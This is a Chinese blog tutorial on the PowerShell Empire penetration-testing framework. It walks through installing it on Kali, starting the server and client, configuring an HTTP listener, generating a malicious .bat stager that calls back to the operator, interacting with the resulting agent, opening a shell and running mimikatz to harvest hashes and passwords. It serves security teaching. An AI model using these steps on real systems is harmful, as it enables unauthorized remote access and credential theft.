Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。
在kali中安装
在kali中安装很简单,我们只需执行下面命令即可。
代码语言:javascript复制sudo apt install powershell-empire
启动服务端
这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell
服务端
powershell-empire server
启动Empire powershell 客户端
代码语言:javascript复制powershell-empire client
牛刀小试
Empire
的使用方法与msf
的方法相同,先设置监听,生成木马,然后监听反弹代理。
输入Listeners
进入监听页面,uselistener
设置监听模式,共有7种模式
- dbx
- http
- http_foreign
- http_hop
- http_mapi
- http_com
- meterpreter
这里,我们以http
模块为例:
uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行
现在配置完监听模块,我们来看看怎样生成shell.
使用windows/launcher_bat
模块,来生成恶意shell。
usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行
执行完成上面的命令后,我们的恶意文件已经生成。格式为bat
双击运行后,我们可以看到已经成功得到了会话。输入agents
可以查看连接上的计算机的详细信息。
连接设备
和msf一样,我们需要连接当前在线的设备。interact 设备name
interact V1T86EUN
运行help命令,可以看到具体的帮助文档。
由于命令比较多,这里我列举常用的一些命令
进入系统cmd
代码语言:javascript复制shell
使用内置的mimikatz抓取hash和密码
代码语言:javascript复制mimikatz
设备详细信息
代码语言:javascript复制info
总结
empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2162439
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。